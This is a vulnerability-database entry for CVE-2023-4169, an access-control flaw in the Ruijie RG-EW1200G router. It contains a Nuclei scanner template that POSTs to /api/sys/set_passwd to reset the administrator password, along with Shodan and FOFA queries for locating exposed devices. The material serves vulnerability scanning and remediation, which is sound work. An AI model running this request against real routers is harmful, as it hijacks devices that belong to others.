| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Exploit for Improper Access Control in Ruijie Rg-Ew1200G_Firmware | 16 Oct 202305:08 | – | githubexploit | |
| Exploit for Improper Authentication in Ruijienetworks Rg-Ew1200G_Firmware | 16 Oct 202305:08 | – | githubexploit | |
| Exploit for Improper Authentication in Ruijienetworks Rg-Ew1200G_Firmware | 16 Oct 202305:08 | – | githubexploit | |
| Exploit for Improper Access Control in Ruijie Rg-Ew1200G_Firmware | 16 Oct 202305:08 | – | githubexploit | |
| CVE-2023-4169 | 5 Aug 202322:11 | – | circl | |
| Ruijie Networks RG-EW1200G Access Control Error Vulnerability | 5 Aug 202300:00 | – | cnnvd | |
| CVE-2023-4169 | 5 Aug 202318:00 | – | cve | |
| CVE-2023-4169 Ruijie RG-EW1200G Administrator Password set_passwd access control | 5 Aug 202318:00 | – | cvelist | |
| CVE-2023-4169 | 5 Aug 202318:15 | – | nvd | |
| CVE-2023-4169 | 5 Aug 202318:15 | – | osv |
id: CVE-2023-4169
info:
name: Ruijie RG-EW1200G Router - Password Reset
author: DhiyaneshDK
severity: high
description: |
A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.
impact: |
Authenticated low-privilege attackers can reset the administrator password through /api/sys/set_passwd endpoint due to improper access controls, allowing complete takeover of the Ruijie RG-EW1200G router.
remediation: |
Update Ruijie RG-EW1200G firmware to a version newer than 1.0(1)B1P5 that implements proper authorization checks requiring administrator privileges for password reset operations.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4169
- https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G
- https://vuldb.com/?ctiid.236185
- https://vuldb.com/?id.236185
- https://github.com/20142995/sectool
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-4169
cwe-id: CWE-284,NVD-CWE-noinfo
epss-score: 0.47109
epss-percentile: 0.98689
cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ruijie
product: rg-ew1200g_firmware
shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
tags: cve,cve2023,ruijie,router,intrusive,vkev,vuln
variables:
password: "{{rand_base(8)}}"
http:
- method: POST
path:
- "{{BaseURL}}/api/sys/set_passwd"
body: |
{
"username":"web",
"admin_new":"{{password}}"
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"result":"ok"'
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 4b0a0048304602210085d8c378c112503efdfea26449d4a75ebb02548a0c806c61f2907f429d6c14ff022100e6e23a15dd6e9a717689546ff4088b519bc54ff4b74a6e9a3e6f09b38e56d1b0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation